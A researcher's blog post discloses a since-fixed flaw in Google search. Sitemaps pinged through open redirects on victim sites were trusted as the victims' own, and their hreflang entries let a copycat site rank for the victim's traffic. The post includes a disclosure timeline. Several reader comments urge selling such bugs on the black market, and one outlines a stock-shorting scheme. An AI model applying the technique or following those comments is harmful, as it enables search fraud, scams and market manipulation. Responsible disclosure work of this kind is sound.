in All Posts, Security, SEO/SEM, Web

Google exploit via XML Sitemaps to manipulate search results

Short version:

For the $12 cost of a domain, I was able to rank in Google search results against Amazon, Walmart etc. for high value money terms in the US. The Adwords bid price for some these terms is currently around $1 per click, and companies are spendings 10s of thousands of dollars a month to appear as ads on these search results, and I was appearing for free.

Google have now fixed the issue and awarded a bug bounty of $5000.

Google provides an open URL where you can ‘ping’ an XML sitemap which they will fetch and parse – this file can contain indexation directives. I discovered that for many sites it is possible to ping a sitemap that you (the attacker) are hosting in such a way that Google will trust the evil sitemap as belonging to the victim site.

I believe this is the first time they have awarded a bounty for a security issue in the actual search engine, which directly affects the ranking of sites.

As part of my regular research efforts, I recently discovered an issue to Google that allows an attacker to submit an XML sitemap to Google for a site for which they are not authenticated. As these files can contain indexation directives, such as hreflang, it allows an attacker to utilise these directives to help their own sites rank in the Google search results.

I spent $12 setting up my experiment and was ranking on the first page for high monetizable search terms, with a newly registered domain that had no inbound links.

XML Sitemap & Ping Mechanism

Google allows for the submission of an XML sitemap; these can help them discover URLs to crawl, but can also be used hreflang directives which they use to understand what other international versions of the same page may exist (i.e. “hey Google, this is the US page, but I have a German page on this URL…”). It is not known exactly how Google uses these directives (as with anything related to Google’s search algorithms), but it appears that hreflang allows for one URL to ‘borrow’ the link equity and trust from one URL and use it to rank another URL (i.e. most people link to the US .com version, and so the German version can ‘borrow’ the equity to rank better in Google.de).

You can submit XML sitemaps for your domain either via Google Search Console, inside your robots.txt or via a special ‘ping’ URL. Google’s own docs seem a bit conflicting; at the top of the page they refer to submitting sitemaps via the ping mechanism, but at the bottom of the page they have this warning:

However, in my experience you could absolutely submit new XML sitemaps via the ping mechanism, with Googlebot typically fetching the file within 10-15 seconds of the ping. Importantly, Google also mention a couple of times on the page that if you submit a sitemap via the ping mechanism it will not show up inside your Search Console:

As a related test, I tested whether I could add other known search directives (noindex, rel-canonical) via XML sitemaps (as well as trying a bunch of XML exploits), but Google didn’t seem to use them.

Google Search Console Submission

If you try to submit an XML sitemap in GSC, that includes URLs for another domain you are not authorised for, then GSC rejects them:

We’ll come back to this in a moment.

(Sorry, Jono!)

Open Redirects

Many sites use a URL parameter to control a redirect:

In this example I would be redirected (after login) to page.html. Some sites with poor hygiene allow for what are known as ‘open redirects’, where these parameters allow redirecting to a different domain:

Often these don’t need any interaction (like a login), so they just redirect the user right away:

Open redirects are very common, and often considered not too dangerous; Google does not include them in their bug bounty program for these reasons. However, where possible companies do try to protect against these, but often you can circumvent their protection:

Tesco are a UK retailer doing more than £50 billion in revenue, over a £1 billion of which via their website. I reported this example to Tesco (along with a number of others to other companies that I discovered during this research) and they have since fixed it.

Ping Sitemaps via Open Redirects 😱

At this point, you may have guessed where I’m going with this. In turns out that when you ping an XML sitemap, if the URL you submit is a redirect Google will follow that redirect, even if it is cross domain. Importantly, it seems to still associate that XML sitemap with the domain that did the redirect, and treat the sitemap it finds after the redirect as authorised for that domain. For example:

In this case, the evil.xml sitemap is hosted on blue.com, but Google associates it as belonging to, and being authoritative for, green.com. Using this you can submit XML sitemaps for sites you shouldn’t have control of, and send Google search directives.

Experiment: Using hreflang directive to ‘steal’ equity and rank for free

At this point I had the various moving parts, but I hadn’t confirmed that Google would really trust a cross-domain redirected XML sitemap, so I spun up an experiment to test it. I had done lots of smaller tests to understand various parts of this (as well as various dead ends), but didn’t expect this experiment to work as well as it did.

I created a fake domain for a UK based retail company that doesn’t operate in the USA, and spun up an AWS server that mimicked the site (primarily through harvesting the legit content and retooling it – i.e. changing currency / address etc.). I have anonymised the company (and industry) here to protect them, so lets just call them victim.com.

I now created a fake sitemap that was hosted on evil.com, but contained only URLs for victim.com. These URLs contained hreflang entries for each URL pointing to an equivalent URL on evil.com, indicating it was the US version of victim.com. I now submitted this sitemap via an open redirect URL on victim.com via Google’s ping mechanism.

Within a 48 hours the site started getting small amounts of traffic for long tail terms (SEMRush screenshot):

A couple more days passed and I started appearing for competitive terms on the 1st page, against the likes of Amazon & Walmart:

Furthermore, Google Search Console for evil.com indicated that victim.com was linking to evil.com, although this obviously was not the case:

At this point I found I was also able to submit XML sitemaps for victim.com inside GSC for evil.com:

It seemed that Google had linked the sites, and evil.com’s search console now had some capabilities to influence victim.com’s setup. I could now also track indexation for my submitted sitemaps (you can see I had thousands of pages indexed now).

Searchmetrics was showing the increasing value of the traffic:

Google Search Console was showing over a million search impressions and over 10,000 clicks from Google search; and at this point I had done nothing other than submit the XML sitemap!

You should note that I was not letting people check out on the evil site, but had I wanted to, at this point I could have either scammed people for a lot of money, or setup ads or otherwise have begun monetising this traffic. In my mind this posed a serious risk to Google visitors, as well as a risk to companies relying on Google search for traffic. Traffic was growing still, but I shut my experiment down and aborted my follow up experiments for fear of doing damage.

Discussion

This method is entirely undetectable for victim.com – the XML sitemaps don’t show up on their end, and if you are doing what I did and leveraging their link equity for a different country, then you could entirely fly under the radar. Competitors in the country are operating in would be left quite baffled by the performance of your site (see above where I’m in the search results as Amazon, Walmart & Target, who are all spending significant resources to be there).

In terms of Black Hat SEO, this had a clear usage, and furthermore is the first example I’m aware of of an outright exploit in the algorithm, rather than manipulating ranking factors. The severity of potential financial impact of the issue seems non-trivial – imagine the potential profit from targeting Tesco or similar (I had more tests to run to investigate this more but couldn’t without potentially causing damage).

Google have awarded a $5000 bounty for this, and the Google team were a pleasure to deal with, as always. Thanks to them.

If you have any questions, comments or information you can contact me at [email protected], on Twitter at @TomAnthonySEO, or via contacting me via Distilled.

Disclosure Timeline

  • 23rd September 2017 – I filed the initial bug report.
  • 25th September 2017 – Google responded – they had triaged the bug and were looking into it.
  • 2nd October 2017 – I sent some more details.
  • 9th October – 6th November – some back and forth status updates.
  • 6th November 2017 – Google said “This report has been somewhat hard to determine on what can be done to prevent this kind of behavior and the amount of it’s impact on our search results.I have reached out to team to get a final decision on your report. I know they have been sifting through the data to determine how prevalent the behavior that you described is and whether this is anything immediately that should be done about it.”
  • 6th November 2017 – I replied suggesting they don’t follow cross-domain redirects for pinged sitemaps – there is little good reason for it, and it could be a GSC only feature.
  • 3rd January 2018 – I asked for a status update.
  • 15th January 2018 – Googled replied “Apologies for the delay, I didn’t want to close this report earlier, because we were unable to get a definitive decision, if it would be possible to address this behavior with the redirect chain without breaking many legitimate use cases. I have reached back out to the team reviewing this report to get a final answer and will update you with their response this week.”
  • 15th February 2018 – Google updated to let me know a bug had been filed on the report, and the VRP board would discuss a bounty.
  • 6th March 2018 – Google let me know they had awarded a bounty of $1337.
  • 6th March 2018 – I shared a draft of this post with Google and asked for green light to disclose.
  • 12th March 2018 – Google let me know they hadn’t completed the fix, and asked me to hold off.
  • 25th March 2018 – Google confirmed the fix was live, and gave me green light to post.
  • 17th April 2018 – Google contacted me again to say they had upgraded the bounty amount to $5000. 🙂

Write a Comment

Comment

84 Comments

  1. Its such big ocean of wonders, nobody would know what next might be ground breaking path to reach the serps quickly.
    Brilliant post Tom & hats off with coming up with such an idea in the first place

  2. This was a great find! I think you were seriously underpaid in terms of bounty as this could have been worth wayyyy more!

  3. Great Post! But Google should consider paying a good bounty for it! You did a great job.. someone at your place would have earned thousands of dollars using the bug!!

  4. It took almost 7 months to get this done. You must have sealed your lips very tight because it is impossible to control for so long.

  5. Kudos for being a white knight, but I guess you have no idea how to make money in this world 🙂 How to make 1-100 million in one week:
    Step1) You find a bug in Google Search
    Step 2) You short Google stock
    Step 3) You reach out to major US Financial newspapers via encrypted app , they will ask for a prove to make sure you are the real deal
    Step 4) You will tell them to choose a domain name and keywords and wait for a week
    Step 5) You rank that domain and now they have a prove
    Step 6) They write about this and investors are starting to sell Google stocks
    Step 7 ) You sit and take profit from your stock shootings 🙂

    Anyways, this world needs more people like you so that Evil companies like Google would make even more money 🙂

  6. Considering the amount of damage this bug could have cost them if it were exploited by even a small group of serious marketeers the bounty you received is way too little. They should have added at least 2 zeros in front of the decimal point. Google is soooo cheap. It’s better to not report such bugs with this lack of generosity at sight.

  7. Seriously. $5k?

    Its absolutely an insult. Google must be laughing internally about this… a company that earns billions has “rewarded” you with the equivalent of a slap in the face.

    This exploit would have been worth LITERALLY MILLIONS monthly, even if put to only the most whitest of gleaming whitehat uses.

    I simply cannot believe you told them about this. My mouth is open and my hands are by my side in dismay.

  8. I’m very surprised the bounty paid was only $5,000… It could have caused a lot of damage if used for malicious purposes! Congratz, all the same though 🙂

  9. Google should pay you $50k for this bug! Think about to sell/use this hole, it’s so easy to make millions dollar in a single month.

  10. You guys would be surprised at how much prices for a particular vulnerability vary. I am talking about 2-20 times. no jokes. This depends on some aspects, but I would say, mainly:

    – the moment
    – the company that will pay you

    Believe it or not but given the class of bug he found it was quite a nice reward. Some remote arbitrary command execution issues (issues that allows attackers to take over devices all over the world with little to no user interaction, depending on the software/hardware affected). This is by far the most critical type of vulnerability and some of these, depending on some aspects like I wrote above, may get like 3.000 or 4.000 USD ONLY.

    But, when we talking about compromising devices and installing whatever you want there which could make a variety of things, from just installing a spy software up to building up a huge zombie network that will just be waiting to receive instructions for mass attack, or simple enterprise network take down…those things could mean litterally millions of dollars loss in a day, for EACH AFFECTED ENTERPRISE. So, you wonder… shouldnt these critical issues worth *at least* like 2-3 million USD ? … the bug bounty programs started paying very low prices, that barely reached 1.000 USD…as time past, they have been increasing the prices, because researchers started complaining…many factors involved, but mainly the complexity and dificulty level of exploiting things nowadays. Now if all researchers wake up and realize some of their findings can indeed worth millions, they will end up getting it, at least from the big corporations like Google, Microsoft, etc.

    Anyway, very well written article. In my honest opinion maybe you really deserved much more than 5.000, but you know the richer most people/companies get the less they want to pay off to all stuff, from the simple to the high priority ones.

  11. Considering how much Google rewarded you for reporting this bug, I guess you shouldn’t have reported it in the first place. xD

  12. You are definitevely an SEO killer !! Since 1998, for me it’s clearly the most advanced black hat SEO attacks and exploit !! It’s so amazing !

    Congratulations for this hack revealed !

  13. Fuck Google, seriously, such a bug and only 5000 USD. Fuck them, sell this on blackmarket next time. Or monetize. They don’t deserve to know.

Webmentions

  • The Time I Hacked Google's Manual Actions Database - Tom Anthony May 3, 2019

    […] their bug bounty program, and thus I was introduced to the world of bug bounties. I went on to hack Google’s core search functionality, and found Zoom didn’t rate limit their numeric meeting passwords in my efforts to join Boris […]

  • 利用Sitemap提交漏洞劫持其它网站排名 – 嘎嘎资讯 May 3, 2019

    […] Tom Anthony不是一般的IT安全人员,显然是干SEO的,而且是英国著名SEO公司Distilled产品研发部门的头。Tom Anthony在他的博客帖子里详细介绍了这个漏洞的用法。 […]

  • Hijacking Google search results for fun, not profit: UK SEO uncovers XML sitemap exploit in Google Search Console May 3, 2019

    […] Detailed in his blog post, Anthony describes how Google’s Search Console (GSC) sitemap submission via ping URL essentially allowed him to submit an XML sitemap for a site he does control, as if it were a sitemap for one he does not. He did this by first finding a target site that allowed open redirects; scraping its contents and creating a duplicate of that site (and its URL structures) on a test server. He then submitted an XML sitemap to Google (hosted on the test server) that included URLs for the targeted domain with hreflang directives pointing to those same URLs, now also present on the test domain. […]

  • Facebook exploit – Confirm website visitor identities - The web development company May 3, 2019

    […] having recently found a bug in Google’s search engine, I set out to see whether I could track or identify Facebook users when they were on other sites. […]

  • Google exploit via XML Sitemaps to manipulate search results - The web development company May 3, 2019

    […] post Google exploit via XML Sitemaps to manipulate search results appeared first on Tom […]

  • XSS attacks on Googlebot allow search index manipulation - The web development company May 3, 2019

    […] year I published details of an attack against Google’s handling of XML Sitemaps, which allowed an attacker to ‘borrow’ PageRank from other sites and rank illegitimate […]

  • il Mobile-First Index e Mobilegeddon sono qui May 3, 2019

    […] leggere di più sull’esperimento su Il blog di Tom Anthony, dove ha rivelato per la prima volta la […]

  • 利用Sitemap提交漏洞劫持其它网站排名 – 先锋SSR May 3, 2019

    […] Tom Anthony不是一般的IT安全人员,显然是干SEO的,而且是英国著名SEO公司Distilled产品研发部门的头。Tom Anthony在他的博客帖子里详细介绍了这个漏洞的用法。 […]

  • ▷ Entführung von Google-Suchergebnissen zum Spaß und nicht zum Profit: Die britische Suchmaschinenoptimierung deckt den XML-Sitemap-Exploit in der Google Search Console auf > MechTechnik.net May 3, 2019

    […] Detailliert in seinem BlogbeitragAnthony beschreibt, wie die Sitemap-Übermittlung von Google Search Console (GSC) über eine Ping-URL es ihm im Wesentlichen ermöglichte, eine XML-Sitemap für eine von ihm kontrollierte Site einzureichen, als wäre es eine Sitemap für eine Site, die er nicht kontrolliert. Er tat dies, indem er zuerst eine Zielseite fand, die offene Weiterleitungen erlaubte; Scraping des Inhalts und Erstellen eines Duplikats dieser Site (und ihrer URL-Strukturen) auf einem Testserver. Anschließend übermittelte er Google eine XML-Sitemap (auf dem Testserver gehostet), die URLs für die Zieldomäne enthielt, wobei hreflang-Anweisungen auf dieselben URLs verweisen, die jetzt auch in der Testdomäne vorhanden sind. […]

  • BrightonSEO April 2018 – Event Recap – Part 3 - DeepCrawl May 3, 2019

    […] as something of a genius in techSEO circles, he also recently won the Google Bug Bounty for a security exploit that influences search results using XML […]

  • Warum scheitert SEO? Gründe für schlechte SEO-Ergebnisse! May 3, 2019

    […] XML-Sitemap goes Black-Hat – Böser Bug, aber gefixt! […]